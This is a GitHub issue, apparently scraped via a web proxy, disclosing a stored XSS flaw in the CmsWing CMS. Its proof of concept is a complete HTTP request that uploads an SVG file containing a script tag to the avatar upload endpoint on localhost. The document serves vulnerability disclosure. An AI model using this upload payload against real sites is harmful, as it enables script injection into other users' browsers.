8000 security vulnerability · Issue #67 · arterli/CmsWing · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

security vulnerability #67

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
Wrin9 opened this issue May 13, 2025 · 1 comment
Open

security vulnerability #67

Wrin9 opened this issue May 13, 2025 · 1 comment

Comments

@Wrin9
Copy link
Wrin9 commented May 13, 2025

Stored XSS (Cross-Site Scripting)
Details:
Under default configuration, after registering and logging in to the frontend, users can exploit a stored XSS vulnerability by uploading an SVG file containing malicious scripts via the file upload API.
Proof of Concept (POC):
POST /mc/setup/avatar HTTP/1.1
Host: 127.0.0.1:7001
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua-mobile: ?0
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:7001/mc/setup
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Cookie: Hm_lvt_c479407a5725732813bcd8384c174467=1747130055; HMACCOUNT=5E9A698141C3998C; EGG_SESS=l1AbkLFiL9ipmEYI3T97yatAjZkESYvX6pVit2qBmFemcEtqsfjZpn41IRnskryZtCDyzbjUXr-4YNQbI4WRfoGvG_x79JWotKyce8j__JXFJk6Q3RrOUkhUrRxKi7RoTrPKnItivwEvCRQmeS3z6JMqW7yZ9iI9nPXeDbWf47kOcGrNZcjKQ6HuUCHfk7MxQM7FGYIwqGvmWXD2Onqmj1J3Q1Y4KV9NbJTSG2PsNsj_YuTzDO4z-Y28irsSBnBaJJoQ4dzDVqctbd4gBXoFLS9ejXuq10itJgblc44vBIuPUnutnpFK9rge_m7cyFYtdgVR667aCpXwHuoaEVgGzC1pJqe7xUGTlBx25ZBFRt_aR_Uj0HguMP3rbDh2JdANP589iy-4vkGE0qdgyDAvErPWXvu0mZnkTv3gBQMWVx1SrkkEnsZ5jVDuxN6e6VW3vPnl4wFQNGBMPBcQp0WZBKRcXxvNckCvsC3zqSYLps3WJwi0Ne3tmzE5OXVKJcBfYhtDYQLl5tV2JlWKz6-3VCPfAphKZMeJGE8Q5PWmGwcbgO0je2kh48ymqRK4Mmvyi15KME5VWG8TZQdnBcaNxIWlcDbI3oprHEY0PUseK73DmFleviRgd4yHqa0YENooGRKrqa1bobNaWsuR3gnW9ojb7mneTN2q6jfVoWyGMXpBS0ltjlwXpXrC2BTpkLMWpYL6r19urKgSc2Pub8mq25h-6q0y5vAP40D-pMYUjtmFgP_XMm-Wmcz5hFPK1ngNDklBD10mZyvvdFm2cBDoq3G8Zwc7UI_E-eJp6veRavn-Zztm_Vlr0ahFlkXbYcFhtnCRXRBbfS1rbT0o7Uqq8GzYqIdnT_GI9lFcPtm-LaH8ydW9GQfZslFLlCY_lZFYB4NTr7bm97U2nv7vKuk5oRxQlL4Fc3ZMTMnhvrNkPWnx6ueZzJQgS0wR3_KlBUcYTVPYh7p1xDWlO3ISpe-35OI3cUkcPgexcW0w_5Z4dQbumbJwEru6XsvphM4bvyhoyu-d15aj1SjObXh1GqXwHdqAfD3eXrz4xvhoRpL-7RUfeSn2roiHnfkdwlOBmLWOM14aV1y0Ao0m35Tkn5B57UMBzriDEFsrHAVlxeFrKFw5pYIThBvs3dRZO-XQvBuxQtOxHsJLEgINVyEZJeb-8GNnWzdhI1pqbeDGg2nVApeL_n0i0p68Y7eJuS5qejCxWcWrfqvcfOvMkPF85YcGSiMQioqjHYXKGzkwV7QZ83GGSq9zZreZiFonwvYic58vv8kluWtZS2RKae6nNVNR4kx07n0MVRcgC-WDmmxx5J61ufwOUhWp-fOq76ufbYsSjmd9XCjujh76BetU9uAbsXdq07tcRuPNr4cDSfgRSqT05orSfoeZTGp9Dr9ltce64a0OY8YxkFYhQCklrIOCVZDuCs2vsGXJXEVqFkMuziX6sHHWwQXQw3g4FK6HQAbEnvJT49u2uS_MA3CML3KzL1AME_qf57pLguaRGg6L3wT-346xrzgRHlEa7MMqTEArdUwuUPAUf94RiEOya_iuZqCPo-s5bamaFFm8UUvgl5bJIVMm-B4QbwFKoNfnA1XuesU5wNc3MvNRvoblC8TJTUbFxYIF0gtjZ3kfGuijGL1-ZZEDyq-gx0Pa3e47LoEXWyGw1Z7mp_rPEm_0OGsYHtQHjk-r6GMeo8GgsT5zBqtNFSLJdo_LbzBCDb0DeGy7XmELFTiCeuayq_XNuUCSaxVtq-ESXHyFuaHiPnUe5C0xR6ypWrj5rFQOCFMVuviw9bAaog2nb0HEB1dSl6mtwlwUUt6Rq-2F7EYjnQeziSXrqDPAnMs5xcJvE5BDbQOLz96UNEWJ_WGfCUc2Ke3V1AkdlV6P2MryWFCUCYJ2O7vKe_Kd35VrRxCLPmDiyNrpFozRR1aONIf2FkXppPt7Q4hKimjVEobs7Xz5onC4m6S6hy7Tid4GbpnbehZtlUfwUjVsy4Umb4gpzYnTuxm89AUSG67D6MW9rcSLUpSecvE=; Hm_lpvt_c479407a5725732813bcd8384c174467=1747134694
Sec-Fetch-Mode: cors
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:7001
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDvVdMwK1GYHq9RW
sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"
Accept: /
Content-Length: 1613

------WebKitFormBoundaryoDvVdMwK1GYHq9RW
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryoDvVdMwK1GYHq9RW
Content-Disposition: form-data; name="param2"

value2
------WebKitFormBoundaryoDvVdMwK1GYHq9RW
Content-Disposition: form-data; name="ajax"

true
------WebKitFormBoundaryoDvVdMwK1GYHq9RW
Content-Disposition: form-data; name="file"; filename="111.svg"
Content-Type: image/png

<script type="text/javascript"> alert('XSS via script tag'); </script>

------WebKitFormBoundaryoDvVdMwK1GYHq9RW--

Image

Image

@zl810881283
Copy link
Collaborator
zl810881283 commented May 13, 2025 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants
0